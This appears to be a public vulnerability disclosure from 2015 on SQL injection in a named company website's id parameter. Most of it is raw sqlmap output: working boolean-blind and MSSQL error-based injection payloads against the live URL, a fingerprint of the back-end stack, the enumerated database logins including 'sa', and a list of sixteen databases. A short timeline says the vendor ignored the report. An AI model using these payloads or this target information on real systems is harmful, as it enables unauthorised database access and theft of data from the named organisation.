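2015-07-05: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2015-08-19: The vendor has actively ignored the vulnerability; details are disclosed to the public.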
RT
http://www.gesafe.com/xintuo/xt_GongSi.aspx?id=31
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=31' AND 8138=8138 AND 'LiwH'='LiwH

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=31' AND 2567=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2567=2567) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(116)+CHAR(114)+CHAR(113))) AND 'fsBi'='fsBi
---
[17:35:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008

database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
[*] test

database management system users password hashes:

available databases [16]:
[*] aigeshang
[*] aomei
[*] beijing
[*] fangyimeieasy
[*] Gs_simu_Online
[*] HouZe_DiChan
[*] HZ_XieZiLou
[*] LiangJiaoLuo
[*] master
[*] model
[*] msdb
[*] Project_Online
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test

Unable to contact the vendor, or the vendor actively refused.